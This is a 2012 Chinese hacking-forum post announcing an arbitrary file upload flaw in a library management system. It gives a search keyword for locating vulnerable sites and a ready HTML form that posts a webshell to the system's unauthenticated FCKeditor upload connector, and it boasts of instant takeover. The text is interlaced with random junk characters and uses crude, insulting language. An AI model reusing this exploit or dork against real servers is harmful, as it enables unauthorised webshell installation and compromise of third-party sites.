主题:图书馆系统任意文件上传漏洞
, d( G2 k% a. V J! w) G6 d 作者:冰锋刺客0 s, h; {* y" R8 R1 f. f
厂商:点击书(dianjishu.com)2 z3 i2 j# [5 f9 d% |5 O# U$ ]
日期:2012-6-219 |/ I$ a1 f( r8 ~6 Z/ I
( _2 _3 D8 ?' G' s9 HI 概述# w: ?: \5 l5 F- w6 Y1 Z1 D' g
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
5 z8 \3 L- |; K1 U II 简介
# x3 G3 j/ w- u$ i0 S5 i 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
% k! U4 a- l+ P9 C" v/ T 补充一个漏洞
9 m V+ j7 \4 { <form id="frmUpload" enctype="multipart/form-data"
+ [" a% h7 h* F5 [ ~; R+ B action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
L+ }& b0 j8 ~7 V3 } <input id="btnUpload" type="submit" value="操翻他">9 P" V. f2 Y2 @6 D
</form>
+ E1 \; B; g' \; j- y: Z; i. \: C 你们懂的( }+ k( M5 n$ a1 [9 N! \4 |: t1 m
那傻逼提供还需要改包.
9 l/ v$ M0 |8 }5 P2 \1 h0 l$ W9 |. x 自己看了下源代码发现fckeditor
' _5 U' y3 g9 m* i 直接秒杀
p3 o0 N; d; s5 k! N |
发表于 2012-9-10 21:20:59
收藏
支持
反对